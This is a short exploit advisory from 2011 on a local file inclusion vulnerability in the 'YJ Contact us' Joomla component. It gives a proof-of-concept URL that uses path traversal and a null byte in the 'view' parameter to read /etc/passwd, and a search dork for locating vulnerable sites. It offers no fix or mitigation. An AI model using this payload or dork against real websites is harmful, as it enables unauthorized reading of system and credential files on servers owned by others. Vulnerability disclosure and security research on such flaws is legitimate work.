Joomla YJ Contact us Component Local File Inclusion Vulnerability
| EKU-ID: 1193 | CVE: | OSVDB-ID: |
| Author: MeGo | Published: 2011-10-26 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 1193 | CVE: | OSVDB-ID: |
| Author: MeGo | Published: 2011-10-26 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
================================================================================
- YJ Contact us - Enhanced Joomla Contact Form <= Local File Inclusion Vulnerability
Software : YJ Contact us - Enhanced Joomla Contact Form
Vendor : http://www.youjoomla.com/yj-contact-us-enhanced-joomla-contact-form-2.html
Author : Mego
Contact : nowar204[at]hotmail[dot]com
Home : NONE
================================================================================
- Exploit
http://localhost/[path]/index.php?option=com_yjcontactus&view=[LFI]
- PoC
http://localhost/[path]/index.php?option=com_yjcontactus&view=../../../../../../../../../../../../../../../../../../../etc/passwd%00
- Dork
"com_yjcontactus"+view
================================================================================
- Greetz
norgod,g0ld,vnc and all brazilian c0ders
================================================================================
- October 25 2011 - Morocco